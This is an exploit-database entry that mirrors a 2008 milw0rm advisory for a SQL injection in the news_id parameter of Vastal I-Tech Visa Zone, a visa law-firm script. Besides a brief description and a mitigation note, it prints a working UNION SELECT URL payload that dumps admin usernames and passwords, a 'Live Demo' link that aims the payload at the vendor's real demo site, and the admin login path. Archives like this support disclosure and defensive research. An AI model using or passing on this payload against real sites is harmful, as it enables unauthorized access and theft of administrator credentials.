header-logo
Suggest Exploit
vendor:
Visa Zone
by:
DeViL iRaQ
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Visa Zone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vastal I-Tech Visa Zone ( news_id ) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the URL. This will allow the attacker to gain access to the admin panel of the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#######################################################
# Vastal I-Tech Visa Zone ( news_id ) SQL Injection Vulnerability
#
# Author   : DeViL iRaQ
#
# Email     : guitar_lover46[at]yahoo[dot]com
#
# Price     : $550.00
#
# Script Home Page : http://www.vastal.com/visa-zone-a-specialised-script-made-just-for-law-firm-dealing-in-visa.html
#
# Demo      : http://www.vastal.com/law_firm/
#
# Dork      : N/A
########################################################
# Exploit :
# www.[sitename].com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
#
# Live Demo:
# http://www.vastal.com/law_firm/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################
# Greetz :
#                      All members of the Forum  WwW.Hussin-X.CoM
#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
#########################################################

# milw0rm.com [2008-09-05]

Navigation

Suggest Exploit

Services By CQR